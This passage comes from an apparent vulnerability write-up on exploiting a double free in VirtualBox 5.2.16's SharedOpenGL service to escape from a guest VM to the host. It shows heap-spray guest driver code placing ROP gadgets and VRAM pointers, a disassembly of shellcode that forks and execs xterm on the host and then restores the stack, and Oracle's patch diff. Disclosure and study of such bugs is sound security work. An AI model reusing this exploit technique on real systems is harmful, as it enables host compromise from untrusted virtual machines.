class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">bufferOffset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-19\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">spraySelector<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-20\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">off<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bufferOffset<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">off<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bufferOffset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> \t\t\t\t<\/span><span class=\"crayon-v\">currentBufferSize<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">off<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint64_t<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-21\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">spraySelector<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-22\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">off<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rop_1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-23\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-24\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uint64_t*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pData<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">off<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">vram_ptr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-25\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-26\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">spraySelector<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">spraySelector<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-27\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-29\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">VBoxHGSMIBufferSubmit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">guestCtx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pShgsmiHdr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-30\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">RT_SUCCESS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">rc<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-31\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">STATUS_UNSUCCESSFUL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-32\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-33\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-35\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* Create H3DORInstance (display) *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-36\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">MySendCrCmdFlip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pDevExt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pContext<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hostId<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f573746146631-38\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">RTThreadSleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">500<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f573746146631-39\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0126 seconds] -->  <\/p>\n<p><b>Shellcode and Process Continuation<\/b><br \/> When the call to the rop gadget is performed we are jumping into the shellcode residing in mapped VRAM:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f57a314480658\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/19i $pc  =&gt; 0x7f8478000000:\tmov    rax,0x3a     0x7f8478000007:\tsyscall     0x7f8478000009:\ttest   rax,rax     0x7f847800000c:\tjne    0x7f8478000048     0x7f847800000e:\tlea    rsi,[rip+0x4e]        # 0x7f8478000063     0x7f8478000015:\tmov    QWORD PTR [rip+0x6b],rsi        # 0x7f8478000087     0x7f847800001c:\tlea    rsi,[rip+0x57]        # 0x7f847800007a     0x7f8478000023:\tmov    QWORD PTR [rip+0x6d],rsi        # 0x7f8478000097     0x7f847800002a:\tlea    rdi,[rip+0x32]        # 0x7f8478000063     0x7f8478000031:\tlea    rsi,[rip+0x4f]        # 0x7f8478000087     0x7f8478000038:\tlea    rdx,[rip+0x58]        # 0x7f8478000097     0x7f847800003f:\tmov    rax,0x3b     0x7f8478000046:\tsyscall     0x7f8478000048:\tmov    rdi,QWORD PTR [rsp+0x1c8]     0x7f8478000050:\tadd    rbp,0x2b0     0x7f8478000057:\tadd    rsp,0x1d0     0x7f847800005e:\txor    rax,rax     0x7f8478000061:\tpush   rdi     0x7f8478000062:\tret    <\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f57a314480658-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f57a314480658-20\">20<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">19i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-2\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x7f8478000000<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3a<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000007<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">syscall<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000009<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">test&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-5\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800000c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">jne<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x7f8478000048<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800000e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4e<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000063<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000015<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6b<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000087<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-8\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800001c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x57<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f847800007a<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-9\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000023<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x6d<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000097<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-10\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800002a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x32<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000063<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000031<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x4f<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000087<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000038<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">lea&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rip<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x58<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># 0x7f8478000097<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800003f<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3b<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000046<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">syscall<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000048<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1c8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000050<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x2b0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-17\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000057<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x1d0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f847800005e<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">xor<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-i\">rax<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f57a314480658-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000061<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">push&nbsp;&nbsp; <\/span><span class=\"crayon-i\">rdi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f57a314480658-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0x7f8478000062<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">ret<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0165 seconds] -->  <\/p>\n<p>The shellcode does fork+execve to spawn xterm in the child process. To continue execution of the virtual machine, we must configure RBP and RSP in such way that the RET instruction will return us back to svcHostCallPerform function where the RDP connection closure was initiated. In order to do so, one adds 0x2B0 to RBP and 0x1D0 to RSP.<\/p>\n<p><strong>Patch<\/strong><br \/> Oracle has fixed the vulnerability by moving the function call causing the double free out of the loop:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f585478629742\" class=\"crayon-syntax crayon-theme-tomorrow-night crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8212; VirtualBox-5.2.16\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp  +++ VirtualBox-5.2.18\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp  @@ -326,10 +326,10 @@               WARN((&#8220;err&#8221;));               break;           }  &#8211;  &#8211;        CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);       }     +    CrFbVisitCreatedEntries(mpFb, entriesDestroyCb, this);  +       return rc;   }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" 